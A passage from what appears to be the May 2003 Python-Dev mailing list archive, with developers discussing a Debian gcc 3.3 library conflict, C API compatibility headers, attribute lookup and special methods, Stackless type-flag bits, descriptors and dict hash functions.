Upgrading therefore includes an element of reading the old docs
to reverse engineer my original intent :-)

But I take the point - this scenario is unlikely enough to be
not worth worrying about.

Thanks for your explanation,
Paul.


From flight@debian.org  Tue May 20 10:59:25 2003
From: flight@debian.org (Gregor Hoffleit)
Date: Tue, 20 May 2003 11:59:25 +0200
Subject: [Python-Dev] [debian build error]
In-Reply-To: <20030519163247.GD26355@localhost>
References: <20030519145755.GB25000@localhost> <16072.62818.314237.459419@montanaro.dyndns.org> <20030519163247.GD26355@localhost>
Message-ID: <20030520095925.GB20760@hal.mediasupervision.de>

* Luke Kenneth Casson Leighton <lkcl@samba-tng.org> [030519 18:39]:
> On Mon, May 19, 2003 at 10:16:50AM -0500, Skip Montanaro wrote:
> > 
> >     Luke> gcc 3.3 is now the latest for unstable.
> > 
> >     Luke> gcc 3.3 contains a package libstdc++-5.
> > 
> >     Luke> python2.2 is compiled with gcc 3.2.
> > 
> >     Luke> installing the latest libstdc++-5, which is compiled with gcc 3.3,
> >     Luke> causes python2.2 to complain:
> > 
> >     Luke> /usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.
> > 
> > Is python2.2 compiled by you from source or is it a Debian-provided package?
>  
>  debian-provided.  i've actually had to remove gcc altogether in order
>  to solve the problem (!!!)

Please report such issues to the Debian Bug Tracking System
(http://bugs.debian.org).

I'm not able to reproduce this problem when I "apt-get install -t
unstable python2.2 gcc-3.3 g++-3.3". On my system, python2.2 is linked
with /usr/lib/libstdc++.so.5, which is provided by the package
libstdc++5, that has been built from the gcc-3.3 source indeed. And
still python2.2 just works fine.

The line with /usr/lib/libgcc1_s.so.1 looks dubious. This ought to be
/lib/libgcc_s.so.1, which is provided by the libgcc1 package, which is
also derived from the gcc-3.3 source.

Can you please make sure that this is really the Debian python2.2
binary, and that you're indeed using /usr/lib/libgcc1_s.so.1 ?


Then, please issue an bug report including information such as the
header lines from starting python2.2, the revision numbers of the
affected packages (at least python2.2, g++-3.3, libstdc++5 and libgcc1).


Thanks,

    Gregor


From mwh@python.net  Tue May 20 12:04:05 2003
From: mwh@python.net (Michael Hudson)
Date: Tue, 20 May 2003 12:04:05 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEHJEGAB.tim@zope.com> ("Tim Peters"'s
 message of "Mon, 19 May 2003 19:26:24 -0400")
References: <LNBBLJKPBEHFEDALKOLCAEHJEGAB.tim@zope.com>
Message-ID: <2mbrxxanh6.fsf@starship.python.net>

"Tim Peters" <tim@zope.com> writes:

> Micheal Hudson made a nice start in that direction, with 2.3's

Hey, even Tims can't spell my name right!

>     Misc/pymemcompat.h
>
> If you write your code to 2.3's simpler memory API, and #include that file,
> it will translate 2.3's spellings (via macros) into older spellings back
> through 1.5.2, keying off PY_VERSION_HEX to choose the right renamings.
>
> Jim is doing something related by hand in these docs, via the unnecessary
>
>     #ifndef PyMODINIT_FUNC	/* declarations for DLL import/export */
>     #define PyMODINIT_FUNC void
>     #endif
>
> blocks.  That is, PyMODINIT_FUNC is defined (via Python.h) in 2.3, so the
> development docs shouldn't encourage pretending it may not be.  It would be
> a good idea to add suitable redefinitions of PyMODINIT_FUNC to pymemcompat.h
> too, but whether someone will volunteer to do so is an open question.

Well, I could do this in a minute, but

(a) the file then becomes misnamed (perhaps pyapicompat.h ...)

(b) I suspect some fraction of the value of pymemcompat.h is that it
    is short and has just-less-than abusive guidance on which memory
    API functions to use.

Cheers,
M.

-- 
  ARTHUR:  Ford, you're turning into a penguin, stop it.
                    -- The Hitch-Hikers Guide to the Galaxy, Episode 2


From walter@livinglogic.de  Tue May 20 12:51:16 2003
From: walter@livinglogic.de (=?ISO-8859-15?Q?Walter_D=F6rwald?=)
Date: Tue, 20 May 2003 13:51:16 +0200
Subject: [Python-Dev] a strange case
In-Reply-To: <200305192033.h4JKXWe19538@pcp02138704pcs.reston01.va.comcast.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org> <200305161345.25415.troy@gci.net> <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net> <3EC806E6.3040204@livinglogic.de> <200305192033.h4JKXWe19538@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3ECA16B4.5070509@livinglogic.de>

Guido van Rossum wrote:
>>But reload() won't work for these pseudo modules (See
>>http://www.python.org/sf/701743).
> 
> Reload() is a hack that doesn't really work except in the most simple
> cases.  This isn't one of those.

It could be made to work, if the code in a module had a way of
knowing whether this import is the first one or not, and it had
access to what was in sys.modules before the import mechanism
replaces it with an empty module.

>>What about the imp module?
 >
> Yes, what about it?  (I don't understand the remark.)

Does the imp module work with modules that replace the
module entry in sys.modules? (Code in PyImport_ExecCodeModuleEx()
seems to indicate that it does.)

Bye,
    Walter Dörwald




From lkcl@samba-tng.org  Tue May 20 15:12:20 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Tue, 20 May 2003 14:12:20 +0000
Subject: [Python-Dev] [debian build error]
In-Reply-To: <20030520095925.GB20760@hal.mediasupervision.de>
References: <20030519145755.GB25000@localhost> <16072.62818.314237.459419@montanaro.dyndns.org> <20030519163247.GD26355@localhost> <20030520095925.GB20760@hal.mediasupervision.de>
Message-ID: <20030520141220.GI26355@localhost>

On Tue, May 20, 2003 at 11:59:25AM +0200, Gregor Hoffleit wrote:
> * Luke Kenneth Casson Leighton <lkcl@samba-tng.org> [030519 18:39]:
> > On Mon, May 19, 2003 at 10:16:50AM -0500, Skip Montanaro wrote:
> > > 
> > >     Luke> gcc 3.3 is now the latest for unstable.
> > > 
> > >     Luke> gcc 3.3 contains a package libstdc++-5.
> > > 
> > >     Luke> python2.2 is compiled with gcc 3.2.
> > > 
> > >     Luke> installing the latest libstdc++-5, which is compiled with gcc 3.3,
> > >     Luke> causes python2.2 to complain:
> > > 
> > >     Luke> /usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.
> > > 
> > > Is python2.2 compiled by you from source or is it a Debian-provided package?
> >  
> >  debian-provided.  i've actually had to remove gcc altogether in order
> >  to solve the problem (!!!)
> 
> Please report such issues to the Debian Bug Tracking System
> (http://bugs.debian.org).

 done that: i was just endeavouring to catch the attention of the
 relevant people.


> I'm not able to reproduce this problem when I "apt-get install -t
> unstable python2.2 gcc-3.3 g++-3.3". 

 try adding unstable to your /etc/apt/source.list and then doing
 an apt-get upgrade.


> On my system, python2.2 is linked
> with /usr/lib/libstdc++.so.5, which is provided by the package
> libstdc++5, that has been built from the gcc-3.3 source indeed. And
> still python2.2 just works fine.

 yes but python2.2 (python2.2-5 or 6) is built and linked with
 gcc 3.2 not gcc 3.3.

 by upgrading the libstdc++.so.5 to one that was built with gcc-3.3
 you get the problem that occurs on my system.


> The line with /usr/lib/libgcc1_s.so.1 looks dubious. This ought to be
> /lib/libgcc_s.so.1, which is provided by the libgcc1 package, which is
> also derived from the gcc-3.3 source.


> Can you please make sure that this is really the Debian python2.2
> binary, and that you're indeed using /usr/lib/libgcc1_s.so.1 ?
 
 yes it is the debian python2.2 binary.

 and /usr/lib/libgcc1_s.so.1.

 i appear not to have /lib in my /etc/ld.so.conf i do _not_ know
 why not.

 ... it may be because i have upgraded from debian potato on cds
 repeatedly over a period of at least two years?


> Then, please issue an bug report including information such as the
> header lines from starting python2.2, the revision numbers of the
> affected packages (at least python2.2, g++-3.3, libstdc++5 and libgcc1).
 
  i have to work on this as a production system.

  i spent several frantic hours coming up with a procedure to recover
  my system back to a useable state.

  unfortunately i cannot risk the time it might take up on having
  a broken system.

  

  if all programs built with gcc-3.2 (including python2.2 and
  update-menus and groff and minicom and a whole boat-load of
  others) are replaced with programs built with gcc-3.3 then
  the problem i experienced goes away.

  l.

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From tismer@tismer.com  Tue May 20 15:38:03 2003
From: tismer@tismer.com (Christian Tismer)
Date: Tue, 20 May 2003 16:38:03 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net> <3EC91EA0.5090105@tismer.com> <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net> <3EC94A92.2040604@tismer.com> <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3ECA3DCB.50306@tismer.com>

Guido van Rossum wrote:

>>>It's better to reserve bits explicitly.  Can you submit a patch to SF
>>>that makes reservations of the bits you need?  All they need is a
>>>definition of a symbol and a comment explaining what it is for;
>>>"reserved for Stackless" is fine.

Tismer:
>>Ok, what I'm asking for is:
>>"please reserve one bit for me in tp->flags" (31 preferred) and
>>"please reserve 8 bits for me in ml->flags" (24-31 preferred).

There is one second thought about this, but I'm not sure
whether it is allowed to do so:

Assuming that I *would* simply do add a field to PyMethodDef,
and take care that all types coming from foreign binaries
don't have that special type bit set, could I not simply create
a new method table and replace it for that external type
by just changing its method table pointer?

I think traversing method tables is always an action that
the core dll does. Or do I have to fear that an extension
does special things to method tables at runtime?

If that approach is trustworthy, I also could drop
the request for these 8 bits.

thanks - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/



From pje@telecommunity.com  Tue May 20 17:19:43 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Tue, 20 May 2003 12:19:43 -0400
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary
 for 2003-05-01 through 2003-05-15)
In-Reply-To: <60FB8BB7F0EFC7409B75EEEC13E20192022DE51A@admin56.narex.com
 >
Message-ID: <5.1.1.6.0.20030520121436.0311de20@telecommunity.com>

At 12:25 AM 5/20/03 -0600, Bjorn Pettersen wrote:
> > From: Phillip J. Eby [mailto:pje@telecommunity.com]
> >
> > 1. First, the class/type and its bases are searched, checking
> > dictionaries only.
> >
> > 2. If the object found is a "data descriptor"  (i.e. has a
> > type with a non-null tp_descr_set pointer, which is closely
> > akin to whether the descriptor has a '__set__' attribute),
> > then the data descriptor's __get__ method is invoked.
> >
> > 3. If the object is not found, or not a data descriptor, the
> > instance dictionary is checked.  If the attribute isn't in the
> > instance dictionary, then the descriptor's __get__ method is
> > invoked (assuming a descriptor was found).
> >
> > 4. Invoke __getattr__ if present.
> >
> > (Note that replacing __getattribute__ *replaces* this entire
> > algorithm.)
> >
> > Also note that special methods are *not* handled specially here.
> > The behavior Aahz is referring to is that slots (e.g. tp_call) on
> > new-style types do not retrieve an instance attribute; they are
> > based purely on class-level data.
>[...]
>
>Wouldn't that be explicitly specified class-level data, i.e. it
>circumvents the __getattr__ hook completely:

I was focusing on the documenting the attribute lookup behavior, not the 
"special methods" behavior.  :)  My point was only that "special methods" 
aren't implemented via attribute lookup, so the attribute lookup rules 
don't apply.


>this makes it impossible to implement a __getattr__ anywhere that
>intercepts len(obj):
>
> >>> class meta(type):
>..   def __getattr__(self, attr):
>..     if attr == '__len__':
>..        return lambda:42
>..
> >>> class C(object):
>..   __metaclass__ = meta
>..
> >>> C.__len__()
>42
> >>> c = C()
> >>> len(c)
>Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>TypeError: len() of unsized object
> >>> len(C)
>Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>TypeError: len() of unsized object
>
>The meta example would have to work to be able to create "true" proxy
>objects(?)

You can always do this:

class C(object):
     def __len__(self):
         return self.getLength()

     def __getattr__(self,attr):
         if attr=='getLength':
              return lambda: 42


if you really need to do that.


>Is this intended behaviour?

You'd have to ask Guido that.



From tim.one@comcast.net  Tue May 20 19:13:53 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 20 May 2003 14:13:53 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <2mbrxxanh6.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCKELPEGAB.tim.one@comcast.net>

[Tim]
>> Micheal Hudson made a nice start in that direction, with 2.3's

[Michael Hudson]
> Hey, even Tims can't spell my name right!

Are you sure it wasn't your parents who screwed up here <wink>?  I have a
flu, and am lucky to spell anything write these dayz.  My apologies to you
and your parents.

>> It would be a good idea to add suitable redefinitions of
>> PyMODINIT_FUNC to pymemcompat.h too, but whether someone will
>> volunteer to do so is an open question.

> Well, I could do this in a minute, but

Time's up.

> (a) the file then becomes misnamed (perhaps pyapicompat.h ...)

Sounds good to me.

> (b) I suspect some fraction of the value of pymemcompat.h is that it
>     is short and has just-less-than abusive guidance on which memory
>     API functions to use.

A new pyapicompat.h could just #include the current pymemcompat.h and a new
pywhatevercompat.h.  I'm not sure how easy the latter would be.  The new

  PyAPI_FUNC(type)
  PyAPI_DATA(type)
  PyMODINIT_FUNC

have snaky platform-dependent expansions, and were introduced because the
older spellings were approximately incomprehensibly smushed together.  Since
I don't know what to do offhand if I wanted to support multiple Pythons
using the current API here, I have to guess most users won't either (for
example, Jim's sample docs change the last one to plain void, which isn't
always right); so if you do, I believe it would be a real help.



From mwh@python.net  Tue May 20 19:31:43 2003
From: mwh@python.net (Michael Hudson)
Date: Tue, 20 May 2003 19:31:43 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKELPEGAB.tim.one@comcast.net> (Tim
 Peters's message of "Tue, 20 May 2003 14:13:53 -0400")
References: <LNBBLJKPBEHFEDALKOLCKELPEGAB.tim.one@comcast.net>
Message-ID: <2mel2tpj00.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

> [Tim]
>>> Micheal Hudson made a nice start in that direction, with 2.3's
>
> [Michael Hudson]
>> Hey, even Tims can't spell my name right!
>
> Are you sure it wasn't your parents who screwed up here <wink>? 

It would certainly be easier for the large fraction of the world who
aren't called Michael if it was spelled like that, but it ain't.  It
is remarkable just how often people do that though.

> I have a flu, and am lucky to spell anything write these dayz.  My
> apologies to you and your parents.

Heh, well I'm taking enough drugs to cope with my wisdom teeth today
you're lucky if I make sense never mind spell things right.

>>> It would be a good idea to add suitable redefinitions of
>>> PyMODINIT_FUNC to pymemcompat.h too, but whether someone will
>>> volunteer to do so is an open question.
>
>> Well, I could do this in a minute, but
>
> Time's up.

I was clearly being optimistic here :-/

>> (a) the file then becomes misnamed (perhaps pyapicompat.h ...)
>
> Sounds good to me.
>
>> (b) I suspect some fraction of the value of pymemcompat.h is that it
>>     is short and has just-less-than abusive guidance on which memory
>>     API functions to use.
>
> A new pyapicompat.h could just #include the current pymemcompat.h and a new
> pywhatevercompat.h.  I'm not sure how easy the latter would be.  The new
>
>   PyAPI_FUNC(type)
>   PyAPI_DATA(type)
>   PyMODINIT_FUNC
>
> have snaky platform-dependent expansions, and were introduced because the
> older spellings were approximately incomprehensibly smushed together.  Since
> I don't know what to do offhand if I wanted to support multiple Pythons
> using the current API here, I have to guess most users won't either (for
> example, Jim's sample docs change the last one to plain void, which isn't
> always right); so if you do, I believe it would be a real help.

I thought the problem with DL_IMPORT/DL_EXPORT was that you wanted one
when statically linking and the other when dynamically linking.  But I
could be wrong.  pyapicompat.h could presumably import more or less
verbatim the whole preprocessory mess that defines PyAPI_FUNC in
Python today? AFAIK it doesn't depend on anything else from Python or
autoconf or so on.  Maybe.

Cheers,
M.

-- 
  NUTRIMAT:  That drink was individually tailored to meet your
             personal requirements for nutrition and pleasure.
    ARTHUR:  Ah.  So I'm a masochist on a diet am I?
                    -- The Hitch-Hikers Guide to the Galaxy, Episode 9


From mwh@python.net  Tue May 20 19:46:42 2003
From: mwh@python.net (Michael Hudson)
Date: Tue, 20 May 2003 19:46:42 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <2mel2tpj00.fsf@starship.python.net> (Michael Hudson's message
 of "Tue, 20 May 2003 19:31:43 +0100")
References: <LNBBLJKPBEHFEDALKOLCKELPEGAB.tim.one@comcast.net>
 <2mel2tpj00.fsf@starship.python.net>
Message-ID: <2mbrxxpib1.fsf@starship.python.net>

Michael Hudson <mwh@python.net> writes:

> pyapicompat.h could presumably import more or less verbatim the
> whole preprocessory mess that defines PyAPI_FUNC in Python today?
> AFAIK it doesn't depend on anything else from Python or autoconf or
> so on.  Maybe.

This is *still* too simplistic, but is probably the right idea.  I'll
try to have a look at it, but won't be disappointed if someone beats
me too it.

Cheers,
M.

-- 
  There are two kinds of large software systems: those that evolved
  from small systems and those that don't work.
                           -- Seen on slashdot.org, then quoted by amk


From tim.one@comcast.net  Tue May 20 20:05:47 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 20 May 2003 15:05:47 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <2mbrxxpib1.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEMIEGAB.tim.one@comcast.net>

[Michael Hudson]
>> pyapicompat.h could presumably import more or less verbatim the
>> whole preprocessory mess that defines PyAPI_FUNC in Python today?
>> AFAIK it doesn't depend on anything else from Python or autoconf or
>> so on.  Maybe.

[Michael too]
> This is *still* too simplistic, but is probably the right idea.  I'll
> try to have a look at it, but won't be disappointed if someone beats
> me too it.

I agree on all counts <wink>.  A difficulty with preprocessor symbols is
their very low "discoverability"; for example, the current maze takes as
input symbols like Py_ENABLE_SHARED and HAVE_DECLSPEC_DLL, and it's rarely
clear where all those may be defined, or why.  I got as far as noting that
the current version of PC/pyconfig.h defines HAVE_DECLSPEC_DLL, and may
define Py_ENABLE_SHARED if Py_NO_ENABLE_SHARED isn't defined, ..., and then
the flu convinced me it's time for another nap.



From BPettersen@NAREX.com  Tue May 20 20:28:18 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Tue, 20 May 2003 13:28:18 -0600
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary   for 2003-05-01 through 2003-05-15)
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE53F@admin56.narex.com>

> From: Phillip J. Eby [mailto:pje@telecommunity.com]=20

[attribute lookup...]

> > > Also note that special methods are *not* handled specially here.
> > > The behavior Aahz is referring to is that slots (e.g. tp_call) on
> > > new-style types do not retrieve an instance attribute; they are
> > > based purely on class-level data.
> >[...]
> >
> >Wouldn't that be explicitly specified class-level data, i.e. it
> >circumvents the __getattr__ hook completely:
>=20
> I was focusing on the documenting the attribute lookup=20
> behavior, not the "special methods" behavior.  :) =20

Fair enough :-)

> My point was only that "special methods" aren't implemented=20
> via attribute lookup, so the attribute lookup rules don't apply.

Very true, although I don't think I could find that in the documentation
anywhere... RefMan 3.3 paragraph 1, last sentence "Except where
mentioned, attempts to execute an operation raise an exception when no
appropriate method is defined." comes close, but seems to be
contradicted by the "__getattr__" documentation in 3.3.2.

[..implementing __len__ through __getattr__..]

> >The meta example would have to work to be able to create "true" proxy
> >objects(?)
>=20
> You can always do this:
>=20
> class C(object):
>      def __len__(self):
>          return self.getLength()
>=20
>      def __getattr__(self,attr):
>          if attr=3D=3D'getLength':
>               return lambda: 42
>=20
> if you really need to do that.

Well... no. E.g. a general RPC proxy might not know what it needs to
special case:

  class MyProxy(object):
     def __init__(self, server, objID, credentials):
         self.__obj =3D someRPClib.connect(server, objID, credentials)

     def __getattr__(self, attr):
         def send(*args, **kw):
             self.__obj.remoteExec(attr, args, kw)
         return send

Do you mean defining "stub" methods for _all_ the special methods?
(there are quite a few of them...)

> >Is this intended behavior?
>=20
> You'd have to ask Guido that.

:-)  The reason I ask is that I'm trying to convert a compiler.ast graph
into a .NET CodeDom graph, and the current behavior seemed unnecessarily
restrictive...

-- bjorn


From guido@python.org  Tue May 20 20:30:56 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 20 May 2003 15:30:56 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Tue, 20 May 2003 16:38:03 +0200."
 <3ECA3DCB.50306@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
 <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
 <3EC94A92.2040604@tismer.com>
 <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
 <3ECA3DCB.50306@tismer.com>
Message-ID: <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>

> There is one second thought about this, but I'm not sure
> whether it is allowed to do so:
> 
> Assuming that I *would* simply do add a field to PyMethodDef,
> and take care that all types coming from foreign binaries
> don't have that special type bit set, could I not simply create
> a new method table and replace it for that external type
> by just changing its method table pointer?

Probably.

I just realize that there are two uses of PyMethodDef.

One is the "classic", where the type's tp_getattr[o] implementation
calls Py_FindMethod.  The other is the new style where the PyMethodDef
array is in tp_methods, and is scanned once by PyType_Ready.  3rd
party modules that have been around for a while are likely to use
Py_FindMethod.  With Py_FindMethod you don't have a convenient way to
store the pointer to the converted table, so it may be better to
simply check your bit in the first array element and then cast to a
PyMethodDef or a PyMethodDefEx array based on what the bit says (you
can safely assume that all elements of an array are the same size :-).

> I think traversing method tables is always an action that
> the core dll does. Or do I have to fear that an extension
> does special things to method tables at runtime?

I wouldn't lose sleep over that.

> If that approach is trustworthy, I also could drop
> the request for these 8 bits.

Sure.  Ah, a bit in the type would work just as well, and
Py_FindMethod *does* have access to the type.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From op73418@mail.telepac.pt  Wed May 21 01:41:16 2003
From: op73418@mail.telepac.pt (=?iso-8859-1?Q?Gon=E7alo_Rodrigues?=)
Date: Wed, 21 May 2003 01:41:16 +0100
Subject: [Python-Dev] Descriptor API
Message-ID: <000501c31f31$b0c820b0$f3100dd5@violante>

I was doing some tricks with metaclasses and descriptors in Python 2.2 and
stumbled on the following:

>>> class test(object):

...             a = property(lambda: 1)

...

>>> print test.a

<property object at 0x01504D20>

>>> print test.a.__set__

<method-wrapper object at 0x01517220>

>>> print test.a.fset

None



What this means in practice, is that if I want to test if a descriptor is
read-only I have to have two tests: One for custom descriptors, checking
that getting __set__ does not barf and another for property, checking that
fset returns None.



So, why doesn't getting __set__  raise AttributeError in the above case?



Is this a bug? If it's not, it sure is a (minor) feature request from my
part :-)



With my best regards,

G. Rodrigues




From tismer@tismer.com  Wed May 21 01:50:40 2003
From: tismer@tismer.com (Christian Tismer)
Date: Wed, 21 May 2003 02:50:40 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net> <3EC91EA0.5090105@tismer.com> <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net> <3EC94A92.2040604@tismer.com> <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net> <3ECA3DCB.50306@tismer.com> <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3ECACD60.10503@tismer.com>

Guido van Rossum wrote:

>>There is one second thought about this, but I'm not sure
>>whether it is allowed to do so:
>>
>>Assuming that I *would* simply do add a field to PyMethodDef,
>>and take care that all types coming from foreign binaries
>>don't have that special type bit set, could I not simply create
>>a new method table and replace it for that external type
>>by just changing its method table pointer?
> 
> 
> Probably.

Promising! Let's see...

> I just realize that there are two uses of PyMethodDef.
> 
> One is the "classic", where the type's tp_getattr[o] implementation
> calls Py_FindMethod.

Right. This one is under my control, since I have the type
and so I have or don't have the bit.

> The other is the new style where the PyMethodDef
> array is in tp_methods, and is scanned once by PyType_Ready.

Right, again. Now, under the hopeful assumption that every
sensible extension module that has some types to publish also
does this through its module dictionary, I would have the
opportunity to cause PyType_Ready being called early enough
to modify the method table, before any of its methods is used
at all.

> 3rd party modules that have been around for a while are likely to use
> Py_FindMethod.  With Py_FindMethod you don't have a convenient way to
> store the pointer to the converted table, so it may be better to
> simply check your bit in the first array element and then cast to a
> PyMethodDef or a PyMethodDefEx array based on what the bit says (you
> can safely assume that all elements of an array are the same size :-).

Hee hee, yeah. Of course, if there isn't a reliable way to
intercept method table access before the first Py_FindMethod
call, I could of course modify Py_FindMethod. For instance,
a modified, new-style method table might be required to always
start with a dummy entry, where the flags word is completely
-1, to signal having been converted to new-style.

...

>>If that approach is trustworthy, I also could drop
>>the request for these 8 bits.
> 
> Sure.  Ah, a bit in the type would work just as well, and
> Py_FindMethod *does* have access to the type.

You think of the definition in methodobject.c, as it is

"""
/* Find a method in a single method list */

PyObject *
Py_FindMethod(PyMethodDef *methods, PyObject *self, char *name)
"""

, assuming that self always is not NULL, but representing a valid
object with a type, and this type is already referring to the
methods table?
Except for module objects, this seems to be right. I've run
Python against a lot of Python modules, but none seems
to call Py_FindMethod with a self parameter of NULL.

If that is true, then I can patch a small couple of
C functions to check for the new bit, and if it's not
there, re-create the method table in place.
This is music to me ears. But...

Well, there is a drawback:
I *do* need two bits, and I hope you will allow me to add this
second bit, as well.

The one, first bit, tells me if the source has been compiled
with Stackless and its extension stuff. Nullo problemo.
I can then in-place modify the method table in a compatible
way, or leave it as it is, bny default.
But then, this isn't sufficient to set this bit then, like an
"everything is fine, now" relief. This is so, since this is *still*
an old module, and while its type's method tables have been
patched, the type is still not augmented by new slots, like
the new tp_call_nr slots (and maybe a bazillion to come, soon).
The drawback is, that I cannot simply replace the whole type
object, since type objects are not represented as object
pointers (like they are now, most of the time, in the dynamic
heaptype case), but they are constant struct addresses, where
the old C module might be referring to.

So, what I think to need is no longer 9 bits, but two of them:
One that says "everything great from the beginning", and another
one that says "well, ok so far, but this is still an old object".

I do think this is the complete story, now.
Instead of requiring nine bits, I'm asking for two.
But this is just *your options; I also can live with one bit,
but then I have to add a special, invalid method table entry
that just serves for this purpose.
In order to keep my souce code hack to the minimum, I'd really
like to ask for the two bits in the typeobject flags.

Thanks so much for being so supportive -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From tim_one@email.msn.com  Wed May 21 04:56:11 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Tue, 20 May 2003 23:56:11 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <000001c31de1$322a0e90$6401a8c0@damien>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECKEKAB.tim_one@email.msn.com>

[damien morton]
> ...
> I need to address Tim's concerns about the poor hash function used for
> python integers, but I think this can be addressed easily enough.

Caution:  in the context of the current scheme, it's an excellent hash
function.  No hash function could be cheaper to compute, and in the common
case of dicts indexed by a contiguous range of integers, there are no
collisions at all.  Christian Tismer contributed the pathological case in
the dictobject.c comments, but I don't know that any such case has been seen
in real life; the current scheme does OK with it.

> I would welcome some guidance about what hash functions need to be
> addressed though. Is it just integers?

Because, e.g., 42 == 42.0 == 42L, and objects that compare equal must have
equal hashcodes, what we do for ints has to be duplicated for at least some
floats and longs too, and more generally for user-defined numeric types that
can call themselves equal to ints (for example, rationals).  For this reason
it may not be possible to change the hash code for integers (although it
would be possible to scramble the incoming hash code when mapping to a table
slot, which is effectively what the current scheme does but only when a
primary collision occurs).

The string hash code is regular for "consecutive" strings, too (like "ab1",
"ab2", "ab3", ...).

Instances of user-defined classes that don't define their own __hash__
effectively use the memory address as the hash code, and of course that's
also very regular across objects at times.

> (theres a great article on integer hash functions at
> www.cris.com/~Ttwang/tech/inthash.htm)

Cool!  I hadn't seen that before -- thanks for the link.



From pje@telecommunity.com  Wed May 21 12:52:53 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Wed, 21 May 2003 07:52:53 -0400
Subject: [Python-Dev] Descriptor API
In-Reply-To: <000501c31f31$b0c820b0$f3100dd5@violante>
Message-ID: <5.1.0.14.0.20030521074949.01feb1d0@mail.telecommunity.com>

At 01:41 AM 5/21/03 +0100, Gonçalo Rodrigues wrote:

>So, why doesn't getting __set__  raise AttributeError in the above case?

Because property() is a type.  And that type has __get__ and __set__ methods.


>Is this a bug?

No.


>If it's not, it sure is a (minor) feature request from my
>part :-)

To do this would require there to be two types, and 'property()' be a 
function that selected which of the two types to instantiate.

Why do you care whether the attribute is read-only?  Are you writing a 
documentation tool?



From g9robjef@cdf.toronto.edu  Thu May 22 03:04:28 2003
From: g9robjef@cdf.toronto.edu (Jeffery Roberts)
Date: Wed, 21 May 2003 22:04:28 -0400 (EDT)
Subject: [Python-Dev] Introduction
Message-ID: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>

Hello all !

I'm new to the list and thought I would quickly introduce myself. My name
is Jeff and I am a university student [4th year] living in Toronto.

